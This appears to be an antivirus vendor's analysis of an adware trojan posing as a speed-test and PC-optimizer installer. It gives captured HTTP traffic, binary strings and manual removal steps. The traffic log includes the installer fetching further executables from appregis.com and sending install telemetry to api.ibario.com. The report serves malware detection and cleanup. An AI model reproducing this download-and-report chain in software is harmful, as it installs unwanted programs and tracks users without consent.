X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br></font><br><br>
<font color="red">GET /ttj?id=3222726&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=0; path=/; expires=Fri, 07-Nov-2014 02:05:07 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:07 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:07 GMT; domain=.adnxs.com; HttpOnly<br>
Location: hXXp://ib.adnxs.com/bounce?/ttj?id=3222726&referrer=[REFERRER_URL]<br>
Content-Type: text/html; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Length: 0<br><<< skipped >>></font><br><br><font color="red">GET /bounce?/ttj?id=3222726&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Content-Type: text/html; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Length: 1034<br><<< skipped >>></font><br><br><font color="red">GET /ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://VVV.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222726&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: icu=ChII_-wYEAoYASABKAEw1IOWnwUQ1IOWnwUYAA..; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Content-Type: application/javascript; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Length: 2059<br><pre>var apn_geo = {..  "FR" : {click_url: "hXXp://www4.smartadserver.com/c<br>all/cliccommand/10656433/286342", img_url : "hXXp://cdn.adnxs.com/p/aa<br>/af/d9/27/aaafd92704a0cc6952b4cbc1eea352f7.JPG"},..  "DE" : {click_url<br>: "hXXps://VVV.unicef.de/spenden/jetzt-spenden", img_url : "hXXp://cdn<br>.adnxs.com/p/92/3a/b0/42/923ab042aa5ccc0bbca187eb929aaa4d.jpg"},..  "U<br>S" : {click_url: "hXXps://VVV.unicefusa.org/donate/donate-end-preventa<br>ble-deaths-children", img_url : "hXXp://cdn.adnxs.com/p/8c/61/a7/a2/8c<br>61a7a22bbf3762f49905913986b68c.jpg"},..  "GB" : {click_url: "hXXp://ww<br>w.unicef.org.uk/donate/donate-now/", img_url : "hXXp://cdn.adnxs.com/p<br>/9f/1a/f4/f9/9f1af4f9eac2fea2a7d208a6b3c03656.jpg"},..  "BR" : {click_<br>url: "hXXps://secure.unicef.org.br", img_url : "hXXp://cdn.adnxs.com/p<br>/78/47/52/64/78475264d818c4a2d2a7ba97ccc2cb32.jpg"},..  "PT" : {click_<br>url: "hXXp://VVV.unicef.pt/artigo.php?mid=18101116&m=7&sid=1810111611"<br>, img_url : "hXXp://cdn.adnxs.com/p/78/47/52/64/78475264d818c4a2d2a7ba<br>97ccc2cb32.jpg"},..}..if ("UA" in apn_geo) {..document.write("<a ta<br>rget=\"_blank\" href=hXXp://nym1.ib.adnxs.com/click?AAAAAAAAAAAAAAAAAA<br>AAAFCNl24Sg9g_AAAAAAAAAAAAAAAAAAAAAMRN-CPf6nhmD13e5zAod23UgeVTAAAAAMYs<br>MQDPCAAA5QAAAAIAAACqpgUBgR4HAAAAAQAAAAAAVVNEANgCWgAbxAAAAAAAAgEAAQIAAJ<br>IA0Ra2NQAAAAA./referrer=http://VVV.performersoft.com/speedtest<br>/?cid=4751/clickenc="   apn_geo["UA"].click_url..   "><img<br> src="   apn_geo["UA"].img_url   "></a>");  ..}else {..  img_<br>url = "hXXp://cdn.adnxs.com/p/9f/1a/f4/f9/9f1af4f9eac2fea2a7d208a6</pre><<< skipped >>></font><br><br><font color="red">GET /ttj?id=3222725&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYASABKAEw1IOWnwUQ1IOWnwUYAA..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Content-Type: text/html; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Length: 1034<br><<< skipped >>></font><br><br><font color="red">GET /ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://VVV.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222725&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYASABKAEw1IOWnwUQ1IOWnwUYAA..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: icu=ChII_-wYEAoYAiACKAIw1IOWnwUQ1IOWnwUYAQ..; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Content-Type: application/javascript; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Length: 5961<br><<< skipped >>></font><br><br>
<font color="red">GET /cookie.php?cid=4751 HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.zulagames.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.17<br>
Set-Cookie: cid=4751; expires=Mon, 08-Sep-2014 02:05:12 GMT; path=/; domain=.zulagames.com<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br></font><br><br>
<font color="red">GET /pagead/viewthroughconversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: googleads.g.doubleclick.net<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, must-revalidate<br>
Location: hXXp://VVV.google.com/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br>
Set-Cookie: test_cookie=CheckForPermission; expires=Sat, 09-Aug-2014 02:20:12 GMT; path=/; domain=.doubleclick.net<br><<< skipped >>></font><br><br>
<font color="red">GET /js/geo2.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn3.optimizely.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: AmazonS3<br>
Content-Length: 291<br>
Content-Type: application/x-javascript<br>
x-amz-id-2: JfVu8nNGDGi l3p7HQACJzYVUDKQxkRKEngemu8HabWpc0Ftzt9DgqNrfAQfpTb5<br>
Vary: Accept-Encoding<br>
ETag: "adadfc5d7afd13e353d9d52cec1c7827"<br>
x-amz-request-id: 347C1B22ADFA7FF5<br>
Cache-Control: max-age=14454<br>
Date: Sat, 09 Aug 2014 02:05:05 GMT<br>
Connection: keep-alive<br><pre>(function(){.  window['optimizely'] = window['optimizely'] || [];.  wi<br>ndow['optimizely'].push(['activateGeoDelayedExperiments', {.    'locat<br>ion':{.      'city': "KHARKIV",.      'continent': "EU",.      'countr<br>y': "UA",.      'region': "".    },.    'ip':"193.138.244.231".  }]);.<br>}).//.()..;..</pre></font><br><br
<font color="red">POST /events HTTP/1.1<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Token: 1ac1acb5747d4b6db021a1ac3947003b<br>
X-Hash: 8dfbdf8fe6e33a49e092cc761253a524a3b138c7<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Content-Length: 180<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
{"country":"","timestamp":"2014-08-09 5:04:36","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":"200654816","component_id":"705","cid":"4751","action":"install","error_type":""}</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:04:48 GMT<br>
Content-Type: application/json<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br>
Access-Control-Allow-Origin: *<br><pre>27..{"flash":{},"error":false,"status":200}..0..</pre></font><br><br>
<font color="red">GET /service/country.php HTTP/1.1<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: VVV.appregis.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx/1.2.4<br>
Date: Sat, 09 Aug 2014 02:04:36 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
X-Powered-By: PHP/5.3.16<br><pre>2..UA..0..</pre></font><br><br><font color="red">GET /files/components/speedtest187Setup.exe HTTP/1.1<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: VVV.appregis.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx/1.2.4<br>
Date: Sat, 09 Aug 2014 02:04:37 GMT<br>
Content-Type: application/octet-stream<br>
Content-Length: 1952545<br>
Last-Modified: Wed, 11 Jun 2014 12:05:16 GMT<br>
Connection: keep-alive<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br><font color="red">GET /files/products/PCPerformerSetup_genericv3.exe HTTP/1.1<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: VVV.appregis.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx/1.2.4<br>
Date: Sat, 09 Aug 2014 02:04:47 GMT<br>
Content-Type: application/octet-stream<br>
Content-Length: 3343896<br>
Last-Modified: Tue, 13 May 2014 09:37:34 GMT<br>
Connection: keep-alive<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br>
<font color="red">GET /ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956&ipr=y HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: VVV.google.com.ua<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, no-store, must-revalidate<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: adclick_server<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br></font><br><br>
<font color="red">GET /jquery-1.9.1.min.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: code.jquery.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Sat, 09 Aug 2014 02:05:06 GMT<br>
Content-Type: application/x-javascript; charset=utf-8<br>
Content-Length: 92629<br>
Connection: keep-alive<br>
Last-Modified: Wed, 26 Mar 2014 00:56:22 GMT<br>
Vary: Accept-Encoding<br>
ETag: "533225b6-169d5"<br>
Expires: Thu, 31 Dec 2037 23:55:55 GMT<br>
Cache-Control: max-age=315360000<br>
Cache-Control: public<br>
Server: NetDNA-cache/2.2<br>
X-Cache: HIT<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br>
<font color="red">GET /en_US/fbds.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: connect.facebook.net<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
ETag: "6aaf747cfda935915d39c54eabad63e0"<br>
Content-Type: application/x-javascript; charset=utf-8<br>
Timing-Allow-Origin: *<br>
Content-Encoding: gzip<br>
Content-MD5: gdTcR9t8u/1pp4CYgQDqRA==<br>
X-FB-Debug: PxXCzIgpHqdTL7T0IVsCfn vgDpO3D3TJLbQzx42ssQnVhIufa1778RCr7pUvGiR9x/U1gPYgDjlWtBFR0FK9A==<br>
Content-Length: 1546<br>
Cache-Control: public, max-age=1200<br>
Expires: Sat, 09 Aug 2014 02:25:12 GMT<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Connection: keep-alive<br>
Vary: Accept-Encoding<br><<< skipped >>></font><br><br>
<font color="red">GET /static/fonts/opensans/v9/cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE.eot HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: themes.googleusercontent.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Type: font/eot<br>
Last-Modified: Thu, 31 Jul 2014 00:49:13 GMT<br>
Date: Tue, 05 Aug 2014 13:54:52 GMT<br>
Expires: Wed, 05 Aug 2015 13:54:52 GMT<br>
Access-Control-Allow-Origin: *<br>
Timing-Allow-Origin: *<br>
X-Content-Type-Options: nosniff<br>
Server: sffe<br>
Content-Length: 18265<br>
X-XSS-Protection: 1; mode=block<br>
Cache-Control: public, max-age=31536000<br>
Age: 303014<br>
Alternate-Protocol: 80:quic<br><<< skipped >>></font><br><br>

The Trojan connects to the servers at the following location(s):

iexplore.exe_1840:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

BackgroundHost.exe_1300:

.text
`.rdata
@.data
.rsrc
@.reloc
FRegDeleteKeyExW
RegDeleteKeyTransactedW
RegOpenKeyTransactedW
Kernel32.dll
Unicows.dll
RegCreateKeyTransactedW
IEIsProtectedModeURL
Visual C++ CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
D:\work\projects\AddonsFrameworkForInstaller\Internet Explorer\Release\BackgroundHost.pdb
GdiplusShutdown
gdiplus.dll
HttpSendRequestW
HttpOpenRequestW
WININET.dll
GetProcessHeap
KERNEL32.dll
CreateDialogIndirectParamW
USER32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
UrlCreateFromPathW
SHLWAPI.dll
GDI32.dll
urlmon.dll
GetCPInfo
.?AV?$CAtlExeModuleT@VCBackgroundHostModule@@@ATL@@
.?AV?$IDispEventImpl@$00VCBrowserFrame@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCBrowserFrame@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$_IDispEventLocator@$00$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventImpl@$00VCPage5@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCPage5@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AVCWebCtrlInterFace@@
'BackgroundHost.EXE'
'%ADDONNAME%.BackgroundHostObject.1' = s 'BackgroundHostObject Class'
CLSID = s '%CLSIDclsIdBackgroundHostObject%'
'%ADDONNAME%.BackgroundHostObject' = s 'BackgroundHostObject Class'
CurVer = s '%ADDONNAME%.BackgroundHostObject.1'
ForceRemove %CLSIDclsIdBackgroundHostObject% = s 'BackgroundHostObject Class'
ProgID = s '%ADDONNAME%.BackgroundHostObject.1'
VersionIndependentProgID = s '%ADDONNAME%.BackgroundHostObject'
stdole2.tlbWWW
Created by MIDL version 7.00.0555 at Thu Oct 24 17:52:37 2013
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
{16CE3BD9-5580-452e-9254-D8F5C02A8B9D}
config.xml
SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD\
{1F733841-2B64-466b-BE22-53A779CB3B29}
{lX-X-x-XX-XXXXXX}
GMscoree.dll
WAdvapi32.dll
OLEAUT32.DLL
Comctl32.dll
GKernel32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
W{18B9B16E-716F-43DF-A6AD-512C7D2EB983}
Econfig.xml
hXXp://besttoolbars.net/af_analytics
background.html
.Width
.Height
64.exe
ScriptHost.dll
BackgroundHost.exe
Bconfig.xml
hXXp://
BWebBrowserHtmlPage
Cconfig.xml
Powered by besttoolbars.net
//addon/key
uxtheme.dll
ieframe.dll
%s0x%.2x%.2x%.2x%.2x%.2x%.2x-
https
statUrl
MSXML2.XMLHTTP
ekernel32.dll
KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
ADVAPI32.DLL
WUSER32.DLL
%Program Files%\Speed Test 187\BackgroundHost.exe
0.9.10.21


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    install_helper_FF.exe:500
    taskkill.exe:1964
    taskkill.exe:1240
    taskkill.exe:776
    BackgroundHost.exe:2036
    PCPerformerSetup.tmp:548
    %original file name%.exe:396
    PCPerformerSetup.exe:284
    PCPerformer.exe:476
    SpeedTest.exe:1220
    regsvr32.exe:788
    regsvr32.exe:1272
    regsvr32.exe:1432
    install_helper_IE.exe:604
    speedtest187.exe:356

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\settings.json (199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon16.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon24.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\jquery-1.9.1.min.js (6984 bytes)
